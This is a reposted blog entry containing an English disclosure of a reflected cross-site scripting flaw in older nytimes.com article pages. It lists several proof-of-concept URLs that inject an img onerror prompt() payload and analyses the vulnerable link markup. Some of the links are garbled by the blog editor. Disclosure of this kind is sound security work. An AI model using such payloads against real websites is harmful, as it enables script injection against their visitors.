注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

白帽子安全漏洞

IT 计算机网络信息安全 漏洞分享 Information Security

 
 
 

日志

 
 
 
 

【转载】New York Times nytimes.com Page Design XSS Vulnerability (Almost all Article Pages Before 2013 are Affected)  

2015-01-13 16:56:21|  分类: XSS |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
New York Times nytimes.com Page Design XSS Vulnerability (Almost all Article Pages Before 2013 are Affected)
 
 

 

Domain:
 
 
 

 

Vulnerability Description:
The vulnerability occurs at New York Times’s URLs. Nytimes (short for New York Times) uses part of the URLs to construct its pages. However, it seems that Nytimes does not filter the content used for the construction at all before 2013.
 
Based on Nytimes’s Design, Almost all URLs before 2013 are affected (All pages of articles). In fact, all article pages that contain “PRINT” button, “SINGLE PAGE” button, “Page *” button, “NEXT PAGE” button are affected.
 
Nytimes changed this mechanism since 2013. It decodes the URLs sent to its server. This makes the mechanism much safer now.
 
However, all URLs before 2013 are still using the old mechanism. This means almost all article pages before 2013 are still vulnerable to XSS attacks. I guess the reason Nytimes does not filter URLs before is cost. It costs too much (money & human capital) to change the database of all posted articles before.
 
 
 
 

 

Living POCs:

" href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" data-mce-href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//'%20">">http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//' "><img src=x onerror=prompt(/justqdjing/)>
?pagewanted=all&_r=0" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E?pagewanted=all&_r=0" data-mce-href="http://blog.163.com/%20http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//' ">?pagewanted=all&_r=0"> http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//' "><img src=x onerror=prompt(/justqdjing/)>?pagewanted=all&_r=0
" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2010/12/07/opinion/07brooks.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" data-mce-href="http://blog.163.com/%20http://www.nytimes.com/2010/12/07/opinion/07brooks.html//' ">"> http://www.nytimes.com/2010/12/07/opinion/07brooks.html//' "><img src=x onerror=prompt(/justqdjing/)>
" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2009/08/06/technology/06stats.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" data-mce-href="http://blog.163.com/%20http://www.nytimes.com/2009/08/06/technology/06stats.html//' ">"> http://www.nytimes.com/2009/08/06/technology/06stats.html//' "><img src=x onerror=prompt(/justqdjing/)>
" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2008/07/09/dining/091crex.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" data-mce-href="http://blog.163.com/%20http://www.nytimes.com/2008/07/09/dining/091crex.html//' ">"> http://www.nytimes.com/2008/07/09/dining/091crex.html//' "><img src=x onerror=prompt(/justqdjing/)>
" href="http://www.tetraph.com/blog/wp-admin/%20http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E" data-mce-href="http://blog.163.com/%20http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//' ">"> http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//' "><img src=x onerror=prompt(/justqdjing/)>

 

 
 
 
 

 

POC Video:
 
 
 
 

 

Vulnerability Analysis:
Take the following link as an example,
 
We can see that for the page reflected, it contains the following codes. All of them are vulnerable.
 
<li class=”print”>
<a href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=print”>Print</testtesttest?pagewanted=print”></a>
</li>
 
<li class=”singlePage”>
<a href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><testtesttest?pagewanted=all”> Single Page</vulnerabletoattack?pagewanted=all”></a>
 </li>
 
<li> <a onclick=”s_code_linktrack(‘Article-MultiPagePageNum2′);” title=”Page 2″ href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=2″>2</testtesttest?pagewanted=2″></a> </li>
 
<li> <a onclick=”s_code_linktrack(‘Article-MultiPagePageNum3′);” title=”Page 3″ href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=3″>3</testtesttest?pagewanted=3″></a> </li>
 
<a class=”next” onclick=”s_code_linktrack(‘Article-MultiPage-Next’);” title=”Next Page” href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=2″>Next Page ?</testtesttest?pagewanted=2″></a>
 
 
 
 

 

 
The vulnerability can be attacked without user login. Tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.
 
 
 
 
 

 

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.
 
 
 
 
 

 

Reported By:
Wang Jing, mathematics student from Nanyang Technological University, Singapore.
 
 
 

 

 
More Details:
  评论这张
 
阅读(11)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017